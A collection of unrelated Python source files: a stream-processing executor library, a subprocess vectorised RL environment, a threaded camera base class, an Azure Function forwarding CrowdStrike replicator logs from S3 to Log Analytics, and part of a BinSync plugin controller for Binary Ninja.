for id, item in _iterqueue(self.waitqueue):
self.sema.acquire()
with self.lock:
if self._status[id] == 'SUBMITTED':
self.pool.inqueue.put((id, item))
self._status[id] = 'RUNNING'
else:
self.sema.release()
self.pool.inqueue.put(StopIteration)
self.inputfeeder_thread = threading.Thread(target=feed_input)
self.inputfeeder_thread.start()
def track_result():
for id, item in self.pool:
self.sema.release()
with self.lock:
self._status[id] = 'COMPLETED'
self.resultqueue.put(item)
self.resultqueue.put(StopIteration)
self.resulttracker_thread = threading.Thread(target=track_result)
self.resulttracker_thread.start()
def track_failure():
for outval, exception in self.pool.failure:
self.sema.release()
id, item = outval
with self.lock:
self._status[id] = 'FAILED'
self.failqueue.put((item, exception))
self.failqueue.put(StopIteration)
self.failuretracker_thread = threading.Thread(target=track_failure)
self.failuretracker_thread.start()
def submit(self, *items):
"""Return job ids assigned to the submitted items."""
with self.lock:
if self.closed:
raise BrokenPipe('Job submission has been closed.')
id = self.jobcount
self._status += ['SUBMITTED'] * len(items)
self.jobcount += len(items)
for item in items:
self.waitqueue.put((id, item))
id += 1
if len(items) == 1:
return id - 1
else:
return range(id - len(items), id)
def cancel(self, *ids):
"""Try to cancel jobs with associated ids.
Return the actual number of jobs cancelled.
"""
ncancelled = 0
with self.lock:
for id in ids:
try:
if self._status[id] == 'SUBMITTED':
self._status[id] = 'CANCELLED'
ncancelled += 1
except IndexError:
pass
return ncancelled
def status(self, *ids):
"""Return the statuses of jobs with associated ids at the
        time of call: either 'SUBMITTED', 'CANCELLED', 'RUNNING',
'COMPLETED' or 'FAILED'.
"""
with self.lock:
if len(ids) > 1:
return [self._status[i] for i in ids]
else:
return self._status[ids[0]]
def close(self):
"""Signal that the executor will no longer accept job submission.
Worker threads/processes are now allowed to terminate after all
        jobs have been completed. Without a call to close(), they will
stay around forever waiting for more jobs to come.
"""
with self.lock:
if self.closed:
return
self.waitqueue.put(StopIteration)
self.closed = True
def join(self):
"""Note that the Executor must be close()'d elsewhere,
or join() will never return.
"""
self.inputfeeder_thread.join()
self.pool.join()
self.resulttracker_thread.join()
self.failuretracker_thread.join()
def shutdown(self):
"""Shut down the Executor. Suspend all waiting jobs.
Running workers will terminate after finishing their current job items.
The call will block until all workers are terminated.
"""
with self.lock:
self.pool.inqueue.put(StopIteration) # Stop the pool workers
self.waitqueue.put(StopIteration) # Stop the input_feeder
_iterqueue(self.waitqueue) >> item[-1] # Exhaust the waitqueue
self.closed = True
self.join()
def __repr__(self):
return '<Executor(%s, poolsize=%s) at %s>' % (self.pool.__class__.__name__,
self.pool.poolsize,
hex(id(self)))
#_____________________________________________________________________
# Collectors and Sorters
class PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def selrecv():
while self.inpipes:
ready, _, _ = select.select(self.inpipes, [], [])
for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = selrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PCollector at %s>' % hex(id(self))
class _PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
All input pipes are polled individually. When none is ready, the
    collector sleeps for a fixed duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inpipes = []
self.waittime = waittime
def pollrecv():
while self.inpipes:
                ready = [p for p in self.inpipes if p.poll()]
                if not ready:
                    time.sleep(self.waittime)
                for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = pollrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
        return '<PCollector at %s>' % hex(id(self))
if sys.platform == "win32":
PCollector = _PCollector
class QCollector(Stream):
"""Collect items from many ThreadedFeeder's or ThreadPool's.
All input queues are polled individually. When none is ready, the
    collector sleeps for a fixed duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inqueues = []
self.waittime = waittime
def nonemptyget():
while self.inqueues:
ready = [q for q in self.inqueues if not q.empty()]
if not ready:
time.sleep(self.waittime)
for q in ready:
item = q.get()
if item is StopIteration:
del self.inqueues[self.inqueues.index(q)]
else:
yield item
self.iterator = nonemptyget()
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
return '<QCollector at %s>' % hex(id(self))
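# Usage sketch (illustrative): gather the output of several ThreadedFeeders
# through a single QCollector.  Ordering across feeders is not guaranteed.
def _example_qcollector():
    feeders = [ThreadedFeeder(iter, [i, i + 10]) for i in range(3)]
    collector = QCollector(waittime=0.05)
    for f in feeders:
        f >> collector
    return sorted(collector >> list)          # [0, 1, 2, 10, 11, 12]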
class PSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def __iter__(self):
return heapq.merge(*__builtin__.map(_iterrecv, self.inpipes))
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PSorter at %s>' % hex(id(self))
class QSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
    ThreadedFeeder's or ThreadPool's.
"""
def __init__(self):
self.inqueues = []
def __iter__(self):
return heapq.merge(*__builtin__.map(_iterqueue, self.inqueues))
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
        return '<QSorter at %s>' % hex(id(self))
#_____________________________________________________________________
# Useful generator functions
def seq(start=0, step=1):
"""An arithmetic sequence generator. Works with any type with + defined.
>>> seq(1, 0.25) >> item[:10]
[1, 1.25, 1.5, 1.75, 2.0, 2.25, 2.5, 2.75, 3.0, 3.25]
"""
def seq(a, d):
while 1:
yield a
a += d
return seq(start, step)
def gseq(ratio, initval=1):
"""A geometric sequence generator. Works with any type with * defined.
>>> from decimal import Decimal
>>> gseq(Decimal('.2')) >> item[:4]
[1, Decimal('0.2'), Decimal('0.04'), Decimal('0.008')]
"""
while 1:
yield initval
initval *= ratio
def repeatcall(func, *args):
"""Repeatedly call func(*args) and yield the result.
Useful when func(*args) returns different results, esp. randomly.
"""
return itertools.starmap(func, itertools.repeat(args))
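# Usage sketch (illustrative): repeatcall is most useful with callables that
# return a different value on every call; a plain counter is used here so the
# result is deterministic.
def _example_repeatcall():
    counter = itertools.count()
    return repeatcall(next, counter) >> item[:5]      # [0, 1, 2, 3, 4]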
def chaincall(func, initval):
"""Yield func(initval), func(func(initval)), etc.
>>> chaincall(lambda x: 3*x, 2) >> take(10)
Stream([2, 6, 18, 54, 162, 486, 1458, 4374, 13122, 39366])
"""
x = initval
while 1:
yield x
x = func(x)
#_____________________________________________________________________
# Useful curried versions of __builtin__.{max, min, reduce}
def maximum(key):
"""
Curried version of the built-in max.
>>> Stream([3, 5, 28, 42, 7]) >> maximum(lambda x: x%28)
42
"""
return lambda s: max(s, key=key)
def minimum(key):
"""
Curried version of the built-in min.
>>> Stream([[13, 52], [28, 35], [42, 6]]) >> minimum(lambda v: v[0] + v[1])
[42, 6]
"""
return lambda s: min(s, key=key)
def reduce(function, initval=None):
"""
Curried version of the built-in reduce.
>>> reduce(lambda x,y: x+y)( [1, 2, 3, 4, 5] )
15
"""
if initval is None:
return lambda s: __builtin__.reduce(function, s)
else:
return lambda s: __builtin__.reduce(function, s, initval)
#_____________________________________________________________________
# main
if __name__ == "__main__":
import doctest
if doctest.testmod()[0]:
import sys
sys.exit(1)
|
subproc_vec_env.py
|
"""
Adapted from https://github.com/openai/baselines/
"""
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
parent_remote.close()
envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == "step":
remote.send([envs[i].step(data[i]) for i in range(len(envs))])
elif cmd == "reset":
remote.send([env.reset() for env in envs])
elif cmd == "reset_mdp":
remote.send([env.reset_mdp() for env in envs])
elif cmd == "set_task":
remote.send([env.set_task(task) for env, task in zip(envs, data)])
elif cmd == "get_task":
remote.send([env.get_task() for env in envs])
elif cmd == "render":
remote.send([env.render(data) for env in envs])
elif cmd == "close":
remote.close()
break
elif cmd == "get_dataset":
remote.send(envs[0].get_dataset())
elif cmd == "get_spaces_spec":
remote.send(
CloudpickleWrapper(
(
envs[0].observation_space,
envs[0].action_space,
envs[0].task_size,
envs[0].task_classify,
)
)
)
else:
raise NotImplementedError
except KeyboardInterrupt:
print("SubprocVecEnv worker: got KeyboardInterrupt")
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
    VecEnv that runs multiple environments in parallel in subprocesses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context="spawn", in_series=1):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert (
nenvs % in_series == 0
), "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(
*[ctx.Pipe() for _ in range(self.nremotes)]
)
self.ps = [
ctx.Process(
target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))
)
for (work_remote, remote, env_fn) in zip(
self.work_remotes, self.remotes, env_fns
)
]
for p in self.ps:
            # if the main process crashes, we should not cause things to hang
            p.daemon = True
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(("get_spaces_spec", None))
observation_space, action_space, task_size, task_classify = (
self.remotes[0].recv().x
)
self.task_size = task_size
self.task_classify = task_classify
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews).reshape(-1, 1), np.stack(dones), infos
def reset(self, task=None):
self._assert_not_closed()
for remote in self.remotes:
remote.send(("reset", task))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def reset_mdp(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(("reset_mdp", None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def get_task(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(("get_task", None))
tasks = [remote.recv() for remote in self.remotes]
tasks = _flatten_list(tasks)
return np.stack(tasks)
def set_task(self, tasks):
self._assert_not_closed()
tasks = np.array_split(tasks, self.nremotes)
for remote, task in zip(self.remotes, tasks):
remote.send(("set_task", task))
[remote.recv() for remote in self.remotes]
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
def get_images(self, resolution):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(("render", resolution))
imgs = [pipe.recv() for pipe in self.remotes]
imgs = _flatten_list(imgs)
return imgs
def get_dataset(self):
self._assert_not_closed()
self.remotes[0].send(("get_dataset", None))
return self.remotes[0].recv()
@property
def _goal(self):
return self.get_task()
def get_all_task_idx(self):
return range(self.task_size)
def _assert_not_closed(self):
assert (
not self.closed
), "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
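# Usage sketch (illustrative, commented out): env_fns are zero-argument
# callables, each building an environment that exposes the task API used by
# the worker above (reset_mdp, set_task, get_task, task_size, task_classify).
# `make_env` and `SomeTaskEnv` are hypothetical placeholders.
#
#   def make_env(seed):
#       def _thunk():
#           env = SomeTaskEnv()        # hypothetical env exposing the task API
#           env.seed(seed)
#           return env
#       return _thunk
#
#   vec_env = SubprocVecEnv([make_env(i) for i in range(8)], in_series=2)
#   obs = vec_env.reset()
#   vec_env.close()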
|
base_camera.py
|
import time
import logging
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
# configure logging system
logging.basicConfig(format='%(asctime)s :: %(message)s',
filename='log.txt',
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
READ_FRAME_TIMER = time.time()
READ_FRAME_COUNTER = 0
READ_FRAME_RATEMEAS = 0.0
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
event = CameraEvent()
def __init__(self):
self.thread = None # background thread that reads frames from camera
self.frame = None # current frame is stored here by background thread
self.last_access = 0 # time of last client access to the camera
self.rlock = threading.RLock()
self.settings = {}
self.settings['timeout'] = 1.0
self.flg = {}
self.flg['kill_thread'] = False
"""Start the background camera thread if it isn't running yet."""
if self.thread is None: #TODO: delete this code
# start background frame thread
self.start_camera()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def start_camera(self):
self.last_access = time.time()
# start background frame thread
self.thread = threading.Thread(target=self._thread)
self.thread.start()
def kill_thread(self):
print("base_camera.py: cleanly killing the camera thread!")
self.flg['kill_thread'] = True
def get_frame(self):
"""Return the current camera frame."""
# auto-start the camera as needed
self.rlock.acquire()
if self.thread is None:
self.start_camera()
        elif not self.thread.isAlive():
            # a finished Thread object cannot be restarted; create a new one
            self.start_camera()
self.rlock.release()
# wait for a signal from the camera thread
self.last_access = time.time()
BaseCamera.event.wait()
BaseCamera.event.clear()
# self.frame was updated in the background thread
return self.frame
def frames(self):
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
def get_error_status(self):
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
def _thread(self):
"""Camera background thread."""
#print('Starting camera thread.')
global READ_FRAME_TIMER, READ_FRAME_COUNTER, READ_FRAME_RATEMEAS
frames_iterator = self.frames()
for frame in frames_iterator:
if frame is not None:
# shared variable: image data
self.frame = frame
# signal to baseclass that the frame has been captured,
# and that self.frame contains fresh data
BaseCamera.event.set()
# if there hasn't been any clients asking for frames in
# the last x seconds then stop the thread
if self.flg['kill_thread'] or \
(time.time() - self.last_access) > self.settings['timeout']:
#print('Stopping camera thread due to inactivity.')
self.flg['kill_thread'] = False
frames_iterator.close()
self.cleanup()
break
# print out rate data
delta_time = time.time() - READ_FRAME_TIMER
READ_FRAME_RATEMEAS += (1/delta_time) / (30*5)
READ_FRAME_TIMER = time.time()
READ_FRAME_COUNTER += 1
if READ_FRAME_COUNTER >= (30*5):
print('base_camera.py: reading data at %.1fHz' % (READ_FRAME_RATEMEAS))
#logging.debug("rate = %.1fHz" % (READ_FRAME_RATEMEAS) )
READ_FRAME_COUNTER = 0
READ_FRAME_RATEMEAS = 0.0
READ_FRAME_TIMER = time.time()
else:
#error = self.get_error_status()
self.frame = None
BaseCamera.event.set() # send signal to clients
frames_iterator.close()
print('base_camera.py: Error. Killing camera thread.')
break
self.rlock.acquire()
self.thread = None
self.rlock.release()
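# Usage sketch (illustrative): a concrete camera only needs to implement
# frames() as a generator of encoded frame bytes; calling get_frame() on an
# instance auto-starts the background thread.  The bytes yielded below are
# placeholders, not real image data.
class ExampleCamera(BaseCamera):
    def frames(self):
        while True:
            time.sleep(1 / 30.0)       # stand-in for waiting on the sensor
            yield b'fake-jpeg-bytes'
    def get_error_status(self):
        return None
# frame = ExampleCamera().get_frame()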
|
__init__.py
|
import boto3
import json
import datetime
from botocore.config import Config as BotoCoreConfig
import tempfile
import os
import gzip
import time
import base64
import hashlib
import hmac
import requests
import threading
import azure.functions as func
import logging
import re
customer_id = os.environ['WorkspaceID']
shared_key = os.environ['WorkspaceKey']
log_type = "CrowdstrikeReplicatorLogs"
AWS_KEY = os.environ['AWS_KEY']
AWS_SECRET = os.environ['AWS_SECRET']
AWS_REGION_NAME = os.environ['AWS_REGION_NAME']
QUEUE_URL = os.environ['QUEUE_URL']
VISIBILITY_TIMEOUT = 60
temp_dir = tempfile.TemporaryDirectory()
if 'logAnalyticsUri' in os.environ:
logAnalyticsUri = os.environ['logAnalyticsUri']
    pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure\.([a-zA-Z\.]+)$"
match = re.match(pattern,str(logAnalyticsUri))
if not match:
raise Exception("Invalid Log Analytics Uri.")
else:
logAnalyticsUri = "https://" + customer_id + ".ods.opinsights.azure.com"
def get_sqs_messages():
logging.info("Creating SQS connection")
sqs = boto3.resource('sqs', region_name=AWS_REGION_NAME, aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
queue = sqs.Queue(url=QUEUE_URL)
logging.info("Queue connected")
for msg in queue.receive_messages(VisibilityTimeout=VISIBILITY_TIMEOUT):
msg_body = json.loads(msg.body)
ts = datetime.datetime.utcfromtimestamp(msg_body['timestamp'] / 1000).strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
logging.info("Start processing bucket {0}: {1} files with total size {2}, bucket timestamp: {3}".format(msg_body['bucket'],msg_body['fileCount'],msg_body['totalSize'],ts))
if "files" in msg_body:
if download_message_files(msg_body) is True:
msg.delete()
def process_message_files():
for file in files_for_handling:
process_file(file)
def download_message_files(msg):
try:
msg_output_path = os.path.join(temp_dir.name, msg['pathPrefix'])
if not os.path.exists(msg_output_path):
os.makedirs(msg_output_path)
for s3_file in msg['files']:
s3_path = s3_file['path']
local_path = os.path.join(temp_dir.name, s3_path)
logging.info("Start downloading file {}".format(s3_path))
s3_client.download_file(msg['bucket'], s3_path, local_path)
if check_damaged_archive(local_path) is True:
logging.info("File {} successfully downloaded.".format(s3_path))
files_for_handling.append(local_path)
else:
logging.warn("File {} damaged. Unpack ERROR.".format(s3_path))
return True
except Exception as ex:
logging.error("Exception in downloading file from S3. Msg: {0}".format(str(ex)))
return False
def check_damaged_archive(file_path):
    chunksize = 1024*1024 # 1 MB
    with gzip.open(file_path, 'rb') as f:
        try:
            # read through the whole archive; a damaged gzip raises on read
            while f.read(chunksize):
                pass
            return True
        except Exception:
            return False
def process_file(file_path):
global processed_messages_success, processed_messages_failed
processed_messages_success = 0
processed_messages_failed = 0
size = 1024*1024
# unzip archive to temp file
out_tmp_file_path = file_path.replace(".gz", ".tmp")
with gzip.open(file_path, 'rb') as f_in:
with open(out_tmp_file_path, 'wb') as f_out:
while True:
data = f_in.read(size)
if not data:
break
f_out.write(data)
os.remove(file_path)
threads = []
with open(out_tmp_file_path) as file_handler:
for data_chunk in split_chunks(file_handler):
chunk_size = len(data_chunk)
logging.info("Processing data chunk of file {} with {} events.".format(out_tmp_file_path, chunk_size))
data = json.dumps(data_chunk)
t = threading.Thread(target=post_data, args=(data, chunk_size))
threads.append(t)
t.start()
for t in threads:
t.join()
logging.info("File {} processed. {} events - successfully, {} events - failed.".format(file_path, processed_messages_success,processed_messages_failed))
os.remove(out_tmp_file_path)
def split_chunks(file_handler, chunk_size=15000):
chunk = []
for line in file_handler:
chunk.append(json.loads(line))
if len(chunk) == chunk_size:
yield chunk
chunk = []
if chunk:
yield chunk
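# Usage sketch (illustrative): split_chunks groups newline-delimited JSON
# records into lists of at most chunk_size parsed events, e.g.
#
#   import io
#   fh = io.StringIO('{"a": 1}\n{"a": 2}\n{"a": 3}\n')
#   list(split_chunks(fh, chunk_size=2))   # [[{'a': 1}, {'a': 2}], [{'a': 3}]]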
def build_signature(customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id,encoded_hash)
return authorization
def post_data(body,chunk_count):
global processed_messages_success, processed_messages_failed
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = logAnalyticsUri + resource + "?api-version=2016-04-01"
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri,data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
processed_messages_success = processed_messages_success + chunk_count
logging.info("Chunk with {} events was processed and uploaded to Azure".format(chunk_count))
else:
processed_messages_failed = processed_messages_failed + chunk_count
logging.warn("Problem with uploading to Azure. Response code: {}".format(response.status_code))
def cb_rename_tmp_to_json(file_path, file_size, lines_count):
out_file_name = file_path.replace(".tmp", ".json")
os.rename(file_path, out_file_name)
def create_s3_client():
try:
boto_config = BotoCoreConfig(region_name=AWS_REGION_NAME)
return boto3.client('s3', region_name=AWS_REGION_NAME, aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET, config=boto_config)
except Exception as ex:
logging.error("Connect to S3 exception. Msg: {0}".format(str(ex)))
return None
s3_client = create_s3_client()
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
logging.info(logAnalyticsUri)
global files_for_handling
files_for_handling = []
get_sqs_messages()
process_message_files()
|
controller.py
|
# ----------------------------------------------------------------------------
# This file contains the BinSyncController class which acts as the
# bridge between the plugin UI and direct calls to the binsync client found in
# the core of binsync. In the controller, you will find code used to make
# pushes and pulls of user changes.
#
# You will also notice that the BinSyncController runs two extra threads in
# it:
# 1. BinSync "git pulling" thread to constantly get changes from others
# 2. Command Routine to get hooked changes to IDA attributes
#
# The second point is more complicated because it acts as the queue of
# runnable actions that are queued from inside the hooks.py file.
# Essentially, every change that happens in IDA from the main user triggers
# a hook which will push an action to be performed onto the command queue,
# causing a "git push" on every change.
#
# ----------------------------------------------------------------------------
from functools import wraps
import re
import threading
import time
import datetime
import logging
from typing import Dict, List, Tuple, Optional, Iterable, Any
from collections import OrderedDict, defaultdict
from PySide2.QtWidgets import QDialog, QMessageBox
from binaryninjaui import (
UIContext,
DockHandler,
DockContextHandler,
UIAction,
UIActionHandler,
Menu,
)
import binaryninja
from binaryninja.interaction import show_message_box
from binaryninja.enums import MessageBoxButtonSet, MessageBoxIcon, VariableSourceType
import binsync
from binsync import Client, ConnectionWarnings, StateContext, State
from binsync.data import StackVariable, StackOffsetType, Function, Struct, Comment
_l = logging.getLogger(name=__name__)
#
# Decorators
#
def init_checker(f):
@wraps(f)
def initcheck(self, *args, **kwargs):
if not self.check_client():
raise RuntimeError("Please connect to a repo first.")
return f(self, *args, **kwargs)
return initcheck
def make_state(f):
"""
    Build a writable State instance and pass it to `f` as the `state` kwarg if the `state` kwarg is None.
    Function `f` should have at least two kwargs, `user` and `state`.
"""
@wraps(f)
def state_check(self, *args, **kwargs):
state = kwargs.pop('state', None)
user = kwargs.pop('user', None)
if state is None:
state = self.client.get_state(user=user)
kwargs['state'] = state
r = f(self, *args, **kwargs)
state.save()
else:
kwargs['state'] = state
r = f(self, *args, **kwargs)
# try:
# if isinstance(args[0], int):
# self._update_function_name_if_none(args[0], user=user, state=state)
# except Exception:
# print(f"[BinSync]: failed to auto set function name for {hex(args[0])}.")
# pass
return r
return state_check
def make_ro_state(f):
"""
    Build a read-only State instance and pass it to `f` as the `state` kwarg if the `state` kwarg is None.
    Function `f` should have at least two kwargs, `user` and `state`.
"""
@wraps(f)
def state_check(self, *args, **kwargs):
state = kwargs.pop('state', None)
user = kwargs.pop('user', None)
if state is None:
state = self.client.get_state(user=user)
kwargs['state'] = state
kwargs['user'] = user
return f(self, *args, **kwargs)
return state_check
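# Usage sketch (illustrative, commented out): methods decorated with
# @init_checker/@make_state can be called without an explicit state; the
# decorator fetches the caller's state, injects it as the `state` kwarg and
# saves it afterwards.  Passing `state=` explicitly skips the extra save so
# several pushes can share one state.  `controller`, `bn_func` and `comments`
# are placeholders for a connected BinsyncController, a Binary Ninja function
# and a {addr: text} dict.
#
#   controller.push_function(bn_func)               # state fetched and saved
#   with controller.state_ctx(locked=True) as state:
#       controller.push_comments(bn_func, comments, state=state)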
#
# Wrapper Classes
#
class SyncControlStatus:
CONNECTED = 0
CONNECTED_NO_REMOTE = 1
DISCONNECTED = 2
#
# Controller
#
class BinsyncController:
def __init__(self):
self.client = None # type: binsync.Client
# === UI update things ===
self.info_panel = None
self._last_reload = time.time()
# start the pull routine
self.pull_thread = threading.Thread(target=self.pull_routine)
self.pull_thread.setDaemon(True)
self.pull_thread.start()
self.curr_bv = None
self.curr_func = None
#
# Multithreaded Stuff
#
def pull_routine(self):
while True:
# pull the repo every 10 seconds
if self.check_client() and self.client.has_remote \
and (
self.client._last_pull_attempt_at is None
or (datetime.datetime.now() - self.client._last_pull_attempt_at).seconds > 10
):
# Pull new items
self.client.pull()
if self.check_client():
# reload curr window fast
#if self.client.has_remote:
# self.client.init_remote()
#users = list(self.users())
#if self.info_panel:
# self.info_panel.reload_curr(users)
                # reload the info panel every 5 seconds
if self.info_panel is not None and time.time() - self._last_reload > 5:
try:
self._last_reload = time.time()
self.info_panel.reload()
except RuntimeError:
# the panel has been closed
self.info_panel = None
# Snooze
time.sleep(1)
#
# State Interaction Functions
#
def connect(self, user, path, init_repo=False, remote_url=None):
binary_md5 = "" #TODO: how to get the md5 in Binja
self.client = Client(user, path, binary_md5,
init_repo=init_repo,
remote_url=remote_url,
)
BinsyncController._parse_and_display_connection_warnings(self.client.connection_warnings)
print(f"[BinSync]: Client has connected to sync repo with user: {user}.")
def check_client(self, message_box=False):
if self.client is None:
if message_box:
QMessageBox.critical(
None,
"BinSync: Error",
"BinSync client does not exist.\n"
"You haven't connected to a binsync repo. Please connect to a binsync repo first.",
QMessageBox.Ok,
)
return False
return True
def state_ctx(self, user=None, version=None, locked=False):
return self.client.state_ctx(user=user, version=version, locked=locked)
def status(self):
if self.check_client():
if self.client.has_remote:
return SyncControlStatus.CONNECTED
return SyncControlStatus.CONNECTED_NO_REMOTE
return SyncControlStatus.DISCONNECTED
def status_string(self):
stat = self.status()
if stat == SyncControlStatus.CONNECTED:
return f"Connected to a sync repo: {self.client.master_user}"
elif stat == SyncControlStatus.CONNECTED_NO_REMOTE:
return f"Connected to a sync repo (no remote): {self.client.master_user}"
else:
return "Not connected to a sync repo"
@init_checker
def users(self):
return self.client.users()
#
# DataBase Fillers
#
# TODO: support structs in Binja
#@init_checker
#@make_ro_state
#def fill_structs(self, user=None, state=None):
# """
# Grab all the structs from a specified user, then fill them locally
#
# @param user:
# @param state:
# @return:
# """
# # sanity check, the desired user has some structs to sync
# pulled_structs: List[Struct] = self.pull_structs(user=user, state=state)
# if len(pulled_structs) <= 0:
# print(f"[BinSync]: User {user} has no structs to sync!")
# return 0
#
# # convert each binsync struct into an ida struct and set it in the GUI
# for struct in pulled_structs:
# compat.set_ida_struct(struct, self)
#
# # set the type of each member in the structs
# all_typed_success = True
# for struct in pulled_structs:
# all_typed_success &= compat.set_ida_struct_member_types(struct, self)
#
# return all_typed_success
#
# Pullers
#
@init_checker
def sync_all(self, user=None, state=None):
# copy the actual state from the other user
self.client.sync_states(user=user)
new_state = self.client.get_state(user=self.client.master_user)
func_addrs = new_state.functions.keys()
print("[BinSync]: Target Addrs for sync:", [hex(x) for x in func_addrs])
# set the new stuff in the UI
for func_addr in func_addrs:
self.fill_function(func_addr, user=self.client.master_user)
def set_curr_bv(self, bv):
self.curr_bv = bv
def mark_as_current_function(self, bv, bn_func):
self.curr_bv = bv
self.curr_func = bn_func
def current_function(self, message_box=False):
all_contexts = UIContext.allContexts()
if not all_contexts:
if message_box:
show_message_box(
"UI contexts not found",
"No UI context is available. Please open a binary first.",
MessageBoxButtonSet.OKButtonSet,
MessageBoxIcon.ErrorIcon,
)
return None
ctx = all_contexts[0]
handler = ctx.contentActionHandler()
if handler is None:
if message_box:
show_message_box(
"Action handler not found",
"No action handler is available. Please open a binary first.",
MessageBoxButtonSet.OKButtonSet,
MessageBoxIcon.ErrorIcon,
)
return None
actionContext = handler.actionContext()
func = actionContext.function
if func is None:
if message_box:
show_message_box(
"No function is in selection",
